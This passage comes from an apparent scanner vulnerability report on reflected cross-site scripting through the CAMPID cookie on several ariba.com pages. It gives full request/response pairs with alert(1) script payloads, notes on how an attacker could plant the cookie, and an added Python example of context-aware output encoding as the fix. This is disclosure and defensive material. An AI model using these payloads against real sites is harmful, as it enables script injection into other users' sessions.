The value of the CAMPID cookie is copied into the value attribute of the hidden campaign_id input, which is encapsulated in double quotation marks. The payload f219e"><script>alert(1)</script>dfa1c716294 was submitted in the CAMPID cookie and was echoed unmodified in the application's response: the leading "> closes the attribute and the tag, so the script element that follows is parsed as markup. The same hidden campaign_id input is echoed on the other ariba.com pages in this report (1.63 to 1.66), so one fix at the shared template should cover all of them.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Because the reflected data is submitted in a cookie, the behaviour is not trivial to exploit against another user: you will typically need a means of setting an arbitrary CAMPID value in the victim's browser. Two routes are worth checking. The application sets cookies with domain=.ariba.com, so script running on any ariba.com subdomain can set a CAMPID cookie that www.ariba.com will receive; and because the page is served over plain HTTP, an on-path attacker can inject a Set-Cookie header into any response. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/404.cfm?pageLocation=404
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=f219e"><script>alert(1)</script>dfa1c716294; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; ALPersonId=13N33417; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=623; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.21.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=100; gpv_pn=%2F404.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252F404.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fcontact.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:18:11 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=873;expires=Wed, 17-Oct-2012 18:18:11 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="f219e"><script>alert(1)</script>dfa1c716294" />
...[SNIP]...

1.63. http://www.ariba.com/legal/en_webtrust.cfm [CAMPID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /legal/en_webtrust.cfm

Issue detail

The value of the CAMPID cookie is copied into the value attribute of the hidden campaign_id input, which is encapsulated in double quotation marks. The payload fa844"><script>alert(1)</script>d6e08f65673 was submitted in the CAMPID cookie and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Exploitability is limited in the same way as issue 1.62: the reflected value comes from a cookie, so an attacker needs a way to set CAMPID in the victim's browser, for example from a sibling ariba.com subdomain or by injecting a Set-Cookie header into this plain-HTTP session. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /legal/en_webtrust.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; CAMPID=fa844"><script>alert(1)</script>d6e08f65673; WEBSCR=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:02:22 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=48;expires=Wed, 17-Oct-2012 18:02:22 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="fa844"><script>alert(1)</script>d6e08f65673" />
...[SNIP]...

1.64. http://www.ariba.com/roles/it.cfm [CAMPID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /roles/it.cfm

Issue detail

The value of the CAMPID cookie is copied into the value attribute of the hidden campaign_id input, which is encapsulated in double quotation marks. The payload de3fb"><script>alert(1)</script>290d4d628a6 was submitted in the CAMPID cookie and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Exploitability is limited in the same way as issue 1.62: the reflected value comes from a cookie, so an attacker needs a way to set CAMPID in the victim's browser, for example from a sibling ariba.com subdomain or by injecting a Set-Cookie header into this plain-HTTP session. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /roles/it.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=de3fb"><script>alert(1)</script>290d4d628a6; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; s_ppv=100; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.7.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=125; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Froles%25252Fit.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:05:13 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=342;expires=Wed, 17-Oct-2012 18:05:13 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<input type="hidden" name="campaign_id" value="de3fb"><script>alert(1)</script>290d4d628a6" />
...[SNIP]...

1.65. http://www.ariba.com/services/support.cfm [CAMPID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /services/support.cfm

Issue detail

The value of the CAMPID cookie is copied into the value attribute of the hidden campaign_id input, which is encapsulated in double quotation marks. The payload 64756"><script>alert(1)</script>063af6a43b5 was submitted in the CAMPID cookie and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Exploitability is limited in the same way as issue 1.62: the reflected value comes from a cookie, so an attacker needs a way to set CAMPID in the victim's browser, for example from a sibling ariba.com subdomain or by injecting a Set-Cookie header into this plain-HTTP session. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /services/support.cfm HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm?7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=64756"><script>alert(1)</script>063af6a43b5; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=293; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.13.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=60; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsupport%25252Fsupport_services.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:07:24 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=546;expires=Wed, 17-Oct-2012 18:07:24 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Ariba Customer Support - Technical Support</
...[SNIP]...
<input type="hidden" name="campaign_id" value="64756"><script>alert(1)</script>063af6a43b5" />
...[SNIP]...

1.66. http://www.ariba.com/solutions/ [CAMPID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /solutions/

Issue detail

The value of the CAMPID cookie is copied into the value attribute of the hidden campaign_id input, which is encapsulated in double quotation marks. The payload 693f8"><script>alert(1)</script>7679c7dae64 was submitted in the CAMPID cookie and was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Exploitability is limited in the same way as issue 1.62: the reflected value comes from a cookie, so an attacker needs a way to set CAMPID in the victim's browser, for example from a sibling ariba.com subdomain or by injecting a Set-Cookie header into this plain-HTTP session. This limitation considerably mitigates the impact of the vulnerability.
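The two sinks in this report differ in what the injected value has to break out of and in what the fix has to encode: issue 1.61 echoes a header value as text between tags, where < alone is enough, while issues 1.62 to 1.66 echo a cookie value inside a double-quoted attribute, where the payload first needs "> to close the attribute and the tag. The Python below is an added example, not part of the XSS.CX report and not code from any site listed in it. It takes the report's own response fragments and canary strings as constructed sample input, classifies the reflection context the way a scanner does, and re-renders each sample with the context-appropriate encoding that would have neutralised both findings. The function names and the context heuristic are this example's own.

```python
import html

# Constructed sample inputs, copied from the response fragments shown in this
# report: issue 1.61 echoes the Referer header between tags, issue 1.62 echoes
# the CAMPID cookie inside a double-quoted attribute value. The canary strings
# are the ones the report shows.
SAMPLES = {
    "1.61 Referer header": {
        "payload": "e90de<script>alert(1)</script>0554eaa8499",
        "body": (
            "<body>\n"
            "Invalid domain [http://www.google.com/search?hl=en&q="
            "e90de<script>alert(1)</script>0554eaa8499]: "
            "please contact your practitioner.</body>"
        ),
    },
    "1.62 CAMPID cookie": {
        "payload": 'f219e"><script>alert(1)</script>dfa1c716294',
        "body": (
            '<input type="hidden" name="campaign_id" '
            'value="f219e"><script>alert(1)</script>dfa1c716294" />'
        ),
    },
}


def classify_reflection(body, payload):
    """Locate the payload in a response body and name the HTML context it lands in.

    Returns (reflected_verbatim, context). context is 'text' (between tags),
    'attribute-dq' (inside a double-quoted attribute value), 'attribute-sq'
    (single-quoted) or 'tag' (inside a tag, outside any quoted value); it is
    (False, None) when the payload was encoded away or never echoed.
    Heuristic: only the markup before the first occurrence is inspected, which
    covers the two sinks in this report; <script> bodies and comments are not modelled.
    """
    idx = body.find(payload)
    if idx == -1:
        return False, None
    before = body[:idx]
    last_open = before.rfind("<")
    last_close = before.rfind(">")
    if last_open <= last_close:
        # The most recent tag was closed before the payload: a text node.
        return True, "text"
    tag_prefix = before[last_open:]
    # An odd number of quotes since the tag opened means we are inside a value.
    if tag_prefix.count('"') % 2 == 1:
        return True, "attribute-dq"
    if tag_prefix.count("'") % 2 == 1:
        return True, "attribute-sq"
    return True, "tag"


def encode_for_context(context, value):
    """Context-aware output encoding for the two contexts this report hits."""
    if context == "text":
        # Between tags: &, < and > must become entities.
        return html.escape(value, quote=False)
    if context == "attribute-dq":
        # Inside a double-quoted attribute: also encode the quote, so the value
        # can no longer close the attribute and open a new tag.
        return html.escape(value, quote=True)
    raise ValueError("no safe encoder for context %r" % (context,))


def render_hardened(name):
    """Re-render a sample with the echoed value encoded for the context it sits in."""
    sample = SAMPLES[name]
    reflected, context = classify_reflection(sample["body"], sample["payload"])
    if not reflected:
        return sample["body"]
    return sample["body"].replace(
        sample["payload"], encode_for_context(context, sample["payload"])
    )


def triage():
    """Run the classifier over every sample; returns {sample name: context}."""
    return {
        name: classify_reflection(s["body"], s["payload"])[1]
        for name, s in SAMPLES.items()
    }


def hardened_is_safe(name):
    """True if the hardened rendering neither echoes the payload verbatim nor
    contains an opening script tag."""
    rendered = render_hardened(name)
    reflected, _ = classify_reflection(rendered, SAMPLES[name]["payload"])
    return not reflected and "<script" not in rendered


if __name__ == "__main__":
    for name, context in triage().items():
        print("%s: payload reflected verbatim in %s context" % (name, context))
        print("  hardened:", render_hardened(name))
        print("  safe after encoding:", hardened_is_safe(name))
```

The classifier is the check a tester runs after seeing a canary come back: the same canary in a text node and in a quoted attribute calls for different break-out characters, and the fix differs accordingly. Encoding with quote=True is the safe default for attribute values; encoding for the text context only (quote=False) would leave the attribute sink in 1.62 exploitable, since the unencoded " still closes the value.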

Request

GET /solutions/ HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/legal/en_webtrust.cfm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=693f8"><script>alert(1)</script>7679c7dae64; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=3; s_cc=true; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.2.10.1318960999; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=32; gpv_pn=%2Flegal%2Fen_webtrust.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Flegal%25252Fen_webtrust.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252Fsolutions%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:04:42 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=215;expires=Wed, 17-Oct-2012 18:04:42 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title> Spend Management Software, Spend Management
...[SNIP]...
<input type="hidden" name="campaign_id" value="693f8"><script>alert(1)</script>7679c7dae64" />
...[SNIP]...
